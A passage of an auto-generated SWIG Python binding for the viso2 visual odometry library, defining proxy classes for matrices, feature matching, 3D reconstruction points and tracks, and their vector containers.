def getMat(self, i1, j1, i2=-1, j2=-1):
"""
getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix
getMat(self, i1, j1, i2=-1) -> Matrix
getMat(self, i1, j1) -> Matrix
"""
return _viso2.Matrix_getMat(self, i1, j1, i2, j2)
def setMat(self, M, i, j):
"""setMat(self, M, i, j)"""
return _viso2.Matrix_setMat(self, M, i, j)
def setVal(self, s, i1=0, j1=0, i2=-1, j2=-1):
"""
setVal(self, s, i1=0, j1=0, i2=-1, j2=-1)
setVal(self, s, i1=0, j1=0, i2=-1)
setVal(self, s, i1=0, j1=0)
setVal(self, s, i1=0)
setVal(self, s)
"""
return _viso2.Matrix_setVal(self, s, i1, j1, i2, j2)
def setDiag(self, s, i1=0, i2=-1):
"""
setDiag(self, s, i1=0, i2=-1)
setDiag(self, s, i1=0)
setDiag(self, s)
"""
return _viso2.Matrix_setDiag(self, s, i1, i2)
def zero(self):
"""zero(self)"""
return _viso2.Matrix_zero(self)
def extractCols(self, idx):
"""extractCols(self, idx) -> Matrix"""
return _viso2.Matrix_extractCols(self, idx)
def eye(m):
"""eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
eye = staticmethod(eye)
def identity(self):
"""identity(self)"""
return _viso2.Matrix_identity(self)
def diag(M):
"""diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
diag = staticmethod(diag)
def reshape(M, m, n):
"""reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
reshape = staticmethod(reshape)
def rotMatX(angle):
"""rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
rotMatX = staticmethod(rotMatX)
def rotMatY(angle):
"""rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
rotMatY = staticmethod(rotMatY)
def rotMatZ(angle):
"""rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
rotMatZ = staticmethod(rotMatZ)
def __add__(self, M):
"""__add__(self, M) -> Matrix"""
return _viso2.Matrix___add__(self, M)
def __sub__(self, M):
"""__sub__(self, M) -> Matrix"""
return _viso2.Matrix___sub__(self, M)
def __mul__(self, *args):
"""
__mul__(self, M) -> Matrix
__mul__(self, s) -> Matrix
"""
return _viso2.Matrix___mul__(self, *args)
def __truediv__(self, *args):
return _viso2.Matrix___truediv__(self, *args)
__div__ = __truediv__
def __neg__(self):
"""__neg__(self) -> Matrix"""
return _viso2.Matrix___neg__(self)
def __invert__(self):
"""__invert__(self) -> Matrix"""
return _viso2.Matrix___invert__(self)
def l2norm(self):
"""l2norm(self) -> FLOAT"""
return _viso2.Matrix_l2norm(self)
def mean(self):
"""mean(self) -> FLOAT"""
return _viso2.Matrix_mean(self)
def cross(a, b):
"""cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
cross = staticmethod(cross)
def inv(M):
"""inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
inv = staticmethod(inv)
def setInverse(self):
"""setInverse(self) -> bool"""
return _viso2.Matrix_setInverse(self)
def det(self):
"""det(self) -> FLOAT"""
return _viso2.Matrix_det(self)
def solve(self, M, eps=1e-20):
"""
solve(self, M, eps=1e-20) -> bool
solve(self, M) -> bool
"""
return _viso2.Matrix_solve(self, M, eps)
def lu(self, idx, d, eps=1e-20):
"""
lu(self, idx, d, eps=1e-20) -> bool
lu(self, idx, d) -> bool
"""
return _viso2.Matrix_lu(self, idx, d, eps)
def svd(self, U, W, V):
"""svd(self, U, W, V)"""
return _viso2.Matrix_svd(self, U, W, V)
__swig_setmethods__["val"] = _viso2.Matrix_val_set
__swig_getmethods__["val"] = _viso2.Matrix_val_get
if _newclass:
val = _swig_property(_viso2.Matrix_val_get, _viso2.Matrix_val_set)
__swig_setmethods__["m"] = _viso2.Matrix_m_set
__swig_getmethods__["m"] = _viso2.Matrix_m_get
if _newclass:
m = _swig_property(_viso2.Matrix_m_get, _viso2.Matrix_m_set)
__swig_setmethods__["n"] = _viso2.Matrix_n_set
__swig_getmethods__["n"] = _viso2.Matrix_n_get
if _newclass:
n = _swig_property(_viso2.Matrix_n_get, _viso2.Matrix_n_set)
def __str__(self):
"""__str__(self) -> std::string"""
return _viso2.Matrix___str__(self)
def toNumpy(self, mat):
"""toNumpy(self, mat)"""
return _viso2.Matrix_toNumpy(self, mat)
Matrix_swigregister = _viso2.Matrix_swigregister
Matrix_swigregister(Matrix)
def Matrix_eye(m):
"""Matrix_eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
def Matrix_diag(M):
"""Matrix_diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
def Matrix_reshape(M, m, n):
"""Matrix_reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
def Matrix_rotMatX(angle):
"""Matrix_rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
def Matrix_rotMatY(angle):
"""Matrix_rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
def Matrix_rotMatZ(angle):
"""Matrix_rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
def Matrix_cross(a, b):
"""Matrix_cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
def Matrix_inv(M):
"""Matrix_inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
class Matcher(_object):
"""Proxy of C++ Matcher class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> Matcher"""
this = _viso2.new_Matcher(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher
__del__ = lambda self: None
def setIntrinsics(self, f, cu, cv, base):
"""setIntrinsics(self, f, cu, cv, base)"""
return _viso2.Matcher_setIntrinsics(self, f, cu, cv, base)
def matchFeatures(self, method, Tr_delta=None):
"""
matchFeatures(self, method, Tr_delta=None)
matchFeatures(self, method)
"""
return _viso2.Matcher_matchFeatures(self, method, Tr_delta)
def bucketFeatures(self, max_features, bucket_width, bucket_height):
"""bucketFeatures(self, max_features, bucket_width, bucket_height)"""
return _viso2.Matcher_bucketFeatures(self, max_features, bucket_width, bucket_height)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.Matcher_getMatches(self)
def getGain(self, inliers):
"""getGain(self, inliers) -> float"""
return _viso2.Matcher_getGain(self, inliers)
def pushBack(self, *args):
"""
pushBack(self, I1, I2, dims, replace)
pushBack(self, I1, dims, replace)
pushBack(self, image1, image2, replace=False)
pushBack(self, image1, image2)
pushBack(self, image1, replace=False)
pushBack(self, image1)
"""
return _viso2.Matcher_pushBack(self, *args)
Matcher_swigregister = _viso2.Matcher_swigregister
Matcher_swigregister(Matcher)
class Matcher_parameters(_object):
"""Proxy of C++ Matcher::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_set
__swig_getmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_get
if _newclass:
nms_n = _swig_property(_viso2.Matcher_parameters_nms_n_get, _viso2.Matcher_parameters_nms_n_set)
__swig_setmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_set
__swig_getmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_get
if _newclass:
nms_tau = _swig_property(_viso2.Matcher_parameters_nms_tau_get, _viso2.Matcher_parameters_nms_tau_set)
__swig_setmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_set
__swig_getmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_get
if _newclass:
match_binsize = _swig_property(_viso2.Matcher_parameters_match_binsize_get, _viso2.Matcher_parameters_match_binsize_set)
__swig_setmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_set
__swig_getmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_get
if _newclass:
match_radius = _swig_property(_viso2.Matcher_parameters_match_radius_get, _viso2.Matcher_parameters_match_radius_set)
__swig_setmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_set
__swig_getmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_get
if _newclass:
match_disp_tolerance = _swig_property(_viso2.Matcher_parameters_match_disp_tolerance_get, _viso2.Matcher_parameters_match_disp_tolerance_set)
__swig_setmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_set
__swig_getmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_get
if _newclass:
outlier_disp_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_disp_tolerance_get, _viso2.Matcher_parameters_outlier_disp_tolerance_set)
__swig_setmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_set
__swig_getmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_get
if _newclass:
outlier_flow_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_flow_tolerance_get, _viso2.Matcher_parameters_outlier_flow_tolerance_set)
__swig_setmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_set
__swig_getmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_get
if _newclass:
multi_stage = _swig_property(_viso2.Matcher_parameters_multi_stage_get, _viso2.Matcher_parameters_multi_stage_set)
__swig_setmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_set
__swig_getmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_get
if _newclass:
half_resolution = _swig_property(_viso2.Matcher_parameters_half_resolution_get, _viso2.Matcher_parameters_half_resolution_set)
__swig_setmethods__["refinement"] = _viso2.Matcher_parameters_refinement_set
__swig_getmethods__["refinement"] = _viso2.Matcher_parameters_refinement_get
if _newclass:
refinement = _swig_property(_viso2.Matcher_parameters_refinement_get, _viso2.Matcher_parameters_refinement_set)
__swig_setmethods__["f"] = _viso2.Matcher_parameters_f_set
__swig_getmethods__["f"] = _viso2.Matcher_parameters_f_get
if _newclass:
f = _swig_property(_viso2.Matcher_parameters_f_get, _viso2.Matcher_parameters_f_set)
__swig_setmethods__["cu"] = _viso2.Matcher_parameters_cu_set
__swig_getmethods__["cu"] = _viso2.Matcher_parameters_cu_get
if _newclass:
cu = _swig_property(_viso2.Matcher_parameters_cu_get, _viso2.Matcher_parameters_cu_set)
__swig_setmethods__["cv"] = _viso2.Matcher_parameters_cv_set
__swig_getmethods__["cv"] = _viso2.Matcher_parameters_cv_get
if _newclass:
cv = _swig_property(_viso2.Matcher_parameters_cv_get, _viso2.Matcher_parameters_cv_set)
__swig_setmethods__["base"] = _viso2.Matcher_parameters_base_set
__swig_getmethods__["base"] = _viso2.Matcher_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Matcher_parameters_base_get, _viso2.Matcher_parameters_base_set)
def __init__(self):
"""__init__(self) -> Matcher_parameters"""
this = _viso2.new_Matcher_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher_parameters
__del__ = lambda self: None
Matcher_parameters_swigregister = _viso2.Matcher_parameters_swigregister
Matcher_parameters_swigregister(Matcher_parameters)
class p_match(_object):
"""Proxy of C++ Matcher::p_match class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, p_match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, p_match, name)
__repr__ = _swig_repr
__swig_setmethods__["u1p"] = _viso2.p_match_u1p_set
__swig_getmethods__["u1p"] = _viso2.p_match_u1p_get
if _newclass:
u1p = _swig_property(_viso2.p_match_u1p_get, _viso2.p_match_u1p_set)
__swig_setmethods__["v1p"] = _viso2.p_match_v1p_set
__swig_getmethods__["v1p"] = _viso2.p_match_v1p_get
if _newclass:
v1p = _swig_property(_viso2.p_match_v1p_get, _viso2.p_match_v1p_set)
__swig_setmethods__["i1p"] = _viso2.p_match_i1p_set
__swig_getmethods__["i1p"] = _viso2.p_match_i1p_get
if _newclass:
i1p = _swig_property(_viso2.p_match_i1p_get, _viso2.p_match_i1p_set)
__swig_setmethods__["u2p"] = _viso2.p_match_u2p_set
__swig_getmethods__["u2p"] = _viso2.p_match_u2p_get
if _newclass:
u2p = _swig_property(_viso2.p_match_u2p_get, _viso2.p_match_u2p_set)
__swig_setmethods__["v2p"] = _viso2.p_match_v2p_set
__swig_getmethods__["v2p"] = _viso2.p_match_v2p_get
if _newclass:
v2p = _swig_property(_viso2.p_match_v2p_get, _viso2.p_match_v2p_set)
__swig_setmethods__["i2p"] = _viso2.p_match_i2p_set
__swig_getmethods__["i2p"] = _viso2.p_match_i2p_get
if _newclass:
i2p = _swig_property(_viso2.p_match_i2p_get, _viso2.p_match_i2p_set)
__swig_setmethods__["u1c"] = _viso2.p_match_u1c_set
__swig_getmethods__["u1c"] = _viso2.p_match_u1c_get
if _newclass:
u1c = _swig_property(_viso2.p_match_u1c_get, _viso2.p_match_u1c_set)
__swig_setmethods__["v1c"] = _viso2.p_match_v1c_set
__swig_getmethods__["v1c"] = _viso2.p_match_v1c_get
if _newclass:
v1c = _swig_property(_viso2.p_match_v1c_get, _viso2.p_match_v1c_set)
__swig_setmethods__["i1c"] = _viso2.p_match_i1c_set
__swig_getmethods__["i1c"] = _viso2.p_match_i1c_get
if _newclass:
i1c = _swig_property(_viso2.p_match_i1c_get, _viso2.p_match_i1c_set)
__swig_setmethods__["u2c"] = _viso2.p_match_u2c_set
__swig_getmethods__["u2c"] = _viso2.p_match_u2c_get
if _newclass:
u2c = _swig_property(_viso2.p_match_u2c_get, _viso2.p_match_u2c_set)
__swig_setmethods__["v2c"] = _viso2.p_match_v2c_set
__swig_getmethods__["v2c"] = _viso2.p_match_v2c_get
if _newclass:
v2c = _swig_property(_viso2.p_match_v2c_get, _viso2.p_match_v2c_set)
__swig_setmethods__["i2c"] = _viso2.p_match_i2c_set
__swig_getmethods__["i2c"] = _viso2.p_match_i2c_get
if _newclass:
i2c = _swig_property(_viso2.p_match_i2c_get, _viso2.p_match_i2c_set)
def __init__(self, *args):
"""
__init__(self) -> p_match
__init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match
"""
this = _viso2.new_p_match(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_p_match
__del__ = lambda self: None
p_match_swigregister = _viso2.p_match_swigregister
p_match_swigregister(p_match)
class Reconstruction(_object):
"""Proxy of C++ Reconstruction class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Reconstruction, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Reconstruction, name)
__repr__ = _swig_repr
def __init__(self):
"""__init__(self) -> Reconstruction"""
this = _viso2.new_Reconstruction()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Reconstruction
__del__ = lambda self: None
def setCalibration(self, f, cu, cv):
"""setCalibration(self, f, cu, cv)"""
return _viso2.Reconstruction_setCalibration(self, f, cu, cv)
def update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2):
"""
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2)
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30)
update(self, p_matched, Tr, point_type=1, min_track_length=2)
update(self, p_matched, Tr, point_type=1)
update(self, p_matched, Tr)
"""
return _viso2.Reconstruction_update(self, p_matched, Tr, point_type, min_track_length, max_dist, min_angle)
def getPoints(self):
"""getPoints(self) -> Point3dVector"""
return _viso2.Reconstruction_getPoints(self)
def getTracks(self):
"""getTracks(self) -> TrackVector"""
return _viso2.Reconstruction_getTracks(self)
Reconstruction_swigregister = _viso2.Reconstruction_swigregister
Reconstruction_swigregister(Reconstruction)
class point3d(_object):
"""Proxy of C++ Reconstruction::point3d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point3d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point3d, name)
__repr__ = _swig_repr
__swig_setmethods__["x"] = _viso2.point3d_x_set
__swig_getmethods__["x"] = _viso2.point3d_x_get
if _newclass:
x = _swig_property(_viso2.point3d_x_get, _viso2.point3d_x_set)
__swig_setmethods__["y"] = _viso2.point3d_y_set
__swig_getmethods__["y"] = _viso2.point3d_y_get
if _newclass:
y = _swig_property(_viso2.point3d_y_get, _viso2.point3d_y_set)
__swig_setmethods__["z"] = _viso2.point3d_z_set
__swig_getmethods__["z"] = _viso2.point3d_z_get
if _newclass:
z = _swig_property(_viso2.point3d_z_get, _viso2.point3d_z_set)
def __init__(self, *args):
"""
__init__(self) -> point3d
__init__(self, x, y, z) -> point3d
"""
this = _viso2.new_point3d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point3d
__del__ = lambda self: None
point3d_swigregister = _viso2.point3d_swigregister
point3d_swigregister(point3d)
class point2d(_object):
"""Proxy of C++ Reconstruction::point2d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point2d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point2d, name)
__repr__ = _swig_repr
__swig_setmethods__["u"] = _viso2.point2d_u_set
__swig_getmethods__["u"] = _viso2.point2d_u_get
if _newclass:
u = _swig_property(_viso2.point2d_u_get, _viso2.point2d_u_set)
__swig_setmethods__["v"] = _viso2.point2d_v_set
__swig_getmethods__["v"] = _viso2.point2d_v_get
if _newclass:
v = _swig_property(_viso2.point2d_v_get, _viso2.point2d_v_set)
def __init__(self, *args):
"""
__init__(self) -> point2d
__init__(self, u, v) -> point2d
"""
this = _viso2.new_point2d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point2d
__del__ = lambda self: None
point2d_swigregister = _viso2.point2d_swigregister
point2d_swigregister(point2d)
class track(_object):
"""Proxy of C++ Reconstruction::track class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, track, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, track, name)
__repr__ = _swig_repr
__swig_setmethods__["pixels"] = _viso2.track_pixels_set
__swig_getmethods__["pixels"] = _viso2.track_pixels_get
if _newclass:
pixels = _swig_property(_viso2.track_pixels_get, _viso2.track_pixels_set)
__swig_setmethods__["pt"] = _viso2.track_pt_set
__swig_getmethods__["pt"] = _viso2.track_pt_get
if _newclass:
pt = _swig_property(_viso2.track_pt_get, _viso2.track_pt_set)
__swig_setmethods__["valid"] = _viso2.track_valid_set
__swig_getmethods__["valid"] = _viso2.track_valid_get
if _newclass:
valid = _swig_property(_viso2.track_valid_get, _viso2.track_valid_set)
__swig_setmethods__["first_frame"] = _viso2.track_first_frame_set
__swig_getmethods__["first_frame"] = _viso2.track_first_frame_get
if _newclass:
first_frame = _swig_property(_viso2.track_first_frame_get, _viso2.track_first_frame_set)
__swig_setmethods__["last_frame"] = _viso2.track_last_frame_set
__swig_getmethods__["last_frame"] = _viso2.track_last_frame_get
if _newclass:
last_frame = _swig_property(_viso2.track_last_frame_get, _viso2.track_last_frame_set)
__swig_setmethods__["last_idx"] = _viso2.track_last_idx_set
__swig_getmethods__["last_idx"] = _viso2.track_last_idx_get
if _newclass:
last_idx = _swig_property(_viso2.track_last_idx_get, _viso2.track_last_idx_set)
def __init__(self):
"""__init__(self) -> track"""
this = _viso2.new_track()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_track
__del__ = lambda self: None
track_swigregister = _viso2.track_swigregister
track_swigregister(track)
class MatchVector(_object):
"""Proxy of C++ std::vector<(Matcher::p_match)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MatchVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MatchVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.MatchVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.MatchVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.MatchVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> MatchVector"""
return _viso2.MatchVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.MatchVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.MatchVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.MatchVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> MatchVector
__getitem__(self, i) -> p_match
"""
return _viso2.MatchVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.MatchVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> p_match"""
return _viso2.MatchVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.MatchVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.MatchVector_empty(self)
def size(self):
"""size(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.MatchVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_begin(self)
def end(self):
"""end(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.MatchVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type"""
return _viso2.MatchVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.MatchVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Matcher::p_match >::iterator
erase(self, first, last) -> std::vector< Matcher::p_match >::iterator
"""
return _viso2.MatchVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> MatchVector
__init__(self, arg2) -> MatchVector
__init__(self, size) -> MatchVector
__init__(self, size, value) -> MatchVector
"""
this = _viso2.new_MatchVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.MatchVector_push_back(self, x)
def front(self):
"""front(self) -> p_match"""
return _viso2.MatchVector_front(self)
def back(self):
"""back(self) -> p_match"""
return _viso2.MatchVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.MatchVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.MatchVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator
insert(self, pos, n, x)
"""
return _viso2.MatchVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.MatchVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_capacity(self)
__swig_destroy__ = _viso2.delete_MatchVector
__del__ = lambda self: None
MatchVector_swigregister = _viso2.MatchVector_swigregister
MatchVector_swigregister(MatchVector)
class Point3dVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::point3d)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Point3dVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Point3dVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.Point3dVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.Point3dVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.Point3dVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> Point3dVector"""
return _viso2.Point3dVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.Point3dVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.Point3dVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.Point3dVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> Point3dVector
__getitem__(self, i) -> point3d
"""
return _viso2.Point3dVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.Point3dVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> point3d"""
return _viso2.Point3dVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.Point3dVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.Point3dVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.Point3dVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.Point3dVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type"""
return _viso2.Point3dVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.Point3dVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator
erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator
"""
return _viso2.Point3dVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> Point3dVector
__init__(self, arg2) -> Point3dVector
__init__(self, size) -> Point3dVector
__init__(self, size, value) -> Point3dVector
"""
this = _viso2.new_Point3dVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.Point3dVector_push_back(self, x)
def front(self):
"""front(self) -> point3d"""
return _viso2.Point3dVector_front(self)
def back(self):
"""back(self) -> point3d"""
return _viso2.Point3dVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.Point3dVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.Point3dVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator
insert(self, pos, n, x)
"""
return _viso2.Point3dVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.Point3dVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_capacity(self)
__swig_destroy__ = _viso2.delete_Point3dVector
__del__ = lambda self: None
Point3dVector_swigregister = _viso2.Point3dVector_swigregister
Point3dVector_swigregister(Point3dVector)
class TrackVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::track)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, TrackVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, TrackVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.TrackVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.TrackVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.TrackVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> TrackVector"""
return _viso2.TrackVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.TrackVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.TrackVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.TrackVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
